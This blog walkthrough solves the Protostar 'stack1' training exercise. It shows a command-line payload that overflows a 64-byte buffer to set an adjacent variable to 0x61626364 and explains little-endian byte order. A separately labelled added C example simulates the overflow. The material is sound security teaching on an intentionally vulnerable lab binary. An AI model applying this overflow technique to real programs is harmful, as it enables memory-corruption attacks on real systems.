PROTOSTAR WALKTHROUGH-Stack-1

Prof.bubs
3 min read, Aug 18, 2021
source: hacksland.net

Hello hackers! Hope you are all doing well today. Now that we have done stack-0 and have a basic idea of how a stack frame is built, we can move on to stack-1.

SOURCE CODE:

source: https://exploit.education/protostar/stack-one/

/opt/protostar/bin/stack1:

Let us analyze the given code. An int named modified is declared first, then a char buffer of 64 bytes. Because buffer is declared after modified, it sits just below modified in the stack frame, so anything written past the end of buffer runs straight into modified, exactly as in stack 0 (you can refer to stack 0 in my previous write-up by clicking here :)). But here there is NO gets() call, so where exactly can we inject our payload?

When we run the program with no arguments it complains that we must specify an argument. Looking at the code, that argument (argv[1]) is what gets copied into buffer, with no length check.

So that is our way in: the payload goes in as the first command-line argument. To build the argument on the fly we can wrap a command in backticks (` ... `) or in $( ... ); the shell runs that command and substitutes its output as the argument passed to the program.

Now the message is different from the first time, so clearly our argument reached the program. What next? Let us look at the code again. The check is if (modified == 0x61626364), so that is the exact value we have to put into the modified variable. Our payload is going to be:

./stack1 $(python -c 'print "A"*64 + "\x64\x63\x62\x61"')

Our payload tells the program to fill the 64-byte buffer with filler characters (A in my payload) and then write the four bytes of the value 0x61626364 into the modified variable. Note that the bytes are written in reverse: x86 is little-endian, so the least significant byte (0x64) goes in memory first, followed by 0x63, 0x62 and finally 0x61.

You might wonder why we used exactly 64 bytes of filler instead of spilling one byte over like last time. Here is the reason. In stack 0 the check was only that modified was non-zero, so any overflow that touched modified at all, even a single extra byte, was enough. Here modified has to equal exactly 0x61626364, so we send precisely 64 bytes of filler to fill the buffer and stop at the first byte of modified, then supply the four bytes of the required value so they land in modified in the right order :D.
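To make the layout reasoning concrete, here is an added example (my own code, not the Protostar source or part of the original post) that models the stack1 frame as a struct with the 64-byte buffer immediately followed by modified, which is the layout the walkthrough assumes. build_payload() writes the 64 filler bytes plus the target value in little-endian order, and run_payload() simulates the unchecked strcpy() with a memcpy into the frame, so you can see what 64, 65 and 68 copied bytes each do to modified. The struct model and the helper names are assumptions for illustration:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the stack1 frame: a 64-byte buffer immediately
 * followed by the 4-byte 'modified' variable. Added example, not the
 * Protostar source. */
struct frame {
    char buffer[64];
    uint32_t modified;
};

#define BUFFER_SIZE 64
#define TARGET 0x61626364u   /* value stack1 compares 'modified' against */

/* Write BUFFER_SIZE filler bytes followed by 'value' in little-endian
 * order (least significant byte first), which is how an x86 CPU stores a
 * 32-bit integer in memory. Returns the payload length, or 0 if 'out' is
 * too small. */
size_t build_payload(unsigned char *out, size_t out_size, uint32_t value)
{
    if (out_size < BUFFER_SIZE + 4)
        return 0;
    memset(out, 'A', BUFFER_SIZE);
    out[BUFFER_SIZE + 0] = (unsigned char)(value & 0xff);
    out[BUFFER_SIZE + 1] = (unsigned char)((value >> 8) & 0xff);
    out[BUFFER_SIZE + 2] = (unsigned char)((value >> 16) & 0xff);
    out[BUFFER_SIZE + 3] = (unsigned char)((value >> 24) & 0xff);
    return BUFFER_SIZE + 4;
}

/* Simulate what strcpy(buffer, argv[1]) does to the frame: copy 'len'
 * bytes starting at the beginning of buffer with no bounds check, so
 * anything past byte 64 lands in 'modified'. Returns the resulting
 * 'modified'. Copies longer than the frame are truncated here so the
 * simulation itself stays in bounds (the real strcpy would keep going and
 * also append a NUL byte after the payload). */
uint32_t run_payload(const unsigned char *payload, size_t len)
{
    struct frame f;
    f.modified = 0;                       /* stack1 sets modified = 0 first */
    memset(f.buffer, 0, sizeof f.buffer);
    if (len > sizeof f)
        len = sizeof f;
    memcpy((unsigned char *)&f, payload, len);   /* the overflow */
    return f.modified;
}

/* Build the full payload but copy only the first 'copy_len' bytes, to
 * show how much of 'modified' a given payload length reaches. */
uint32_t overflow_with(size_t copy_len)
{
    unsigned char payload[BUFFER_SIZE + 4];
    size_t n = build_payload(payload, sizeof payload, TARGET);
    if (copy_len > n)
        copy_len = n;
    return run_payload(payload, copy_len);
}

int main(void)
{
    size_t lens[] = { 64, 65, 68 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        uint32_t got = overflow_with(lens[i]);
        printf("%zu bytes copied -> modified = 0x%08x (%s)\n", lens[i], got,
               got == TARGET ? "correct value" : "Try again");
    }
    return overflow_with(68) == TARGET ? 0 : 1;
}
```

With 64 bytes copied modified is untouched, with 65 only its lowest byte changes (to 0x64), and with all 68 it becomes 0x61626364, which is why the filler must be exactly 64 bytes before the four value bytes.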

That is it for the walkthrough of stack 1. Hope you have understood the concept clearly. More of the stack walkthroughs are yet to be released; until then take care, bye bye :).
